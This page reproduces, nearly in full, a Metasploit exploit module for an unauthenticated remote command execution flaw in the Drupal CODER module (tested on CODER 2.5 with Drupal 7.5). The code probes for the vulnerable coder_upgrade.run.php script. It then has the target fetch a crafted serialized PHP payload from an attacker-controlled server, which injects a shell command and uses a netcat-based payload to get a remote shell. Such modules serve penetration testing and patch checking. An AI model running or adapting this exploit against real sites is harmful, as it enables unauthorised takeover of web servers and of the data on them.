Drupal CODER Module Remote Command Execution
Posted on 26 July 2016
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info={}) super(update_info(info, 'Name' => 'Drupal CODER Module Remote Command Execution', 'Description' => %q{ This module exploits a Remote Command Execution vulnerability in Drupal CODER Module. Unauthenticated users can execute arbitrary command under the context of the web server user. CODER module doesn't sufficiently validate user inputs in a script file that has the php extension. A malicious unauthenticated user can make requests directly to this file to execute arbitrary command. The module does not need to be enabled for this to be exploited This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nicky Bloor', # discovery 'Mehmet Ince <mehmet@mehmetince.net>' # msf module ], 'References' => [ ['URL', 'https://www.drupal.org/node/2765575'] ], 'Privileged' => false, 'Payload' => { 'Space' => 225, 'DisableNops' => true, 'BadChars' => "x00x2f", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat netcat-e' }, }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Automatic', {}] ], 'DisclosureDate' => 'Jul 13 2016', 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']), OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']), OptPort.new('SRVPORT', [true, 'Bogus web server port to listen']) ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), ) if res && res.code == 200 Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def on_request_uri(cli, _request) print_status("Incoming request detected...") p = '' p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}' p << 's:11:"theme_cache";s:16:"theme_cache_test";' p << 's:9:"variables";s:14:"variables_test";' p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}' p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}' p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";' p << 's:7:"new_dir";s:' p << (payload.encoded.length + 14).to_s p << ':"f --help && ' p << payload.encoded p << ' #";s:4:"name";s:4:"test";}}}' print_status("Sending payload...") send_response(cli, p) end def exploit start_service send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), 'encode_params' => false, 'vars_get' => { 'file' => get_uri } ) stop_service end end
